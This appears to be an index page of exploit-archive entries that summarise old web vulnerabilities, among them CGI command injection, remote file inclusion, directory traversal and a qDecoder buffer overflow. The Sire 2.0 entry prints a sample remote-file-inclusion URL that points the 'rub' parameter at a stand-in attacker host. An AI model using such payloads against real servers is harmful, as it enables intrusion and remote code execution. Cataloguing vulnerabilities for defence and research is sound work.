SGI InfoSearch 1.0,SGI IRIX 6.5.x fname Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1031/info The InfoSearch package converts man pages and other documentation into HTML web content. The search form uses infosrch.cgi which does not properly parse user input in the 'fname' variable, allowing commands to b...

N/X Web Content Management System 2002 Prerelease 1 menu.inc.php c_path Parameter RFI

No description provided by source. source: http://www.securityfocus.com/bid/6500/info N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. An attacker may exploit this by supplying a path to a maliciously...

CNC Technology BizDB 1.0 bizdb-search.cgi Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1104/info BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open call and can therefore be made to execute commands at th...

Leif M. Wright simplestmail.cgi 1.0 - Remote Command Execution Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/2102/info A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms. An insecurely-structured call to the open function leads to a failure to properly filte...

phpix 1.0 - Directory Traversal vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/1773/info PHPix is a web-based photo-album system written in PHP. It is vulnerable to an attack that allows a malicious remote user to view arbitrary files on the target webserver with the privileges of the webserver. The...

Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload

+File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "registerglobals" is enabled. lire.php code +Exploit: Exploit http://trajet/lire.php?rub=http://attacker&cahier=1&art=1...

bizdb1-search.cgi located

BizDB is a web database integration product using Perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open call and can therefore be made to execute commands at the privilege level of the webserver. The variable is dbname, and if passed a semicolon...

double094.txt

GulfTech Security Research April 8th, 2005 Vendor : Michael Dean URL : http://dcl.sourceforge.net/ Version : Double Choco Latte 0.9.4 .3 && Earlier Risk : Multiple Vulnerabilities Description: Double Choco Latte is a GNU Enterprise package that provides basic project management capabilities, time...

PHPOpenChat 2.3.43.0.1 - ENGLISH_poc.php Remote File Inclusion

PHPOpenChat 2.3.43.0.1 - ENGLISHpoc.php Remote File Inclusion source: https://www.securityfocus.com/bid/12817/info PHPOpenChat is prone to multiple remote file-include vulnerabilities. An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with...

qDecoder 4.x5.x - Remote Buffer Overflow

qDecoder 4.x5.x - Remote Buffer Overflow source: https://www.securityfocus.com/bid/2329/info Improperly validated user-supplied input to the Content-Type header can create an overflow condition. As a result, excessive data copied onto the stack can overwrite critical parts of the stack frame such...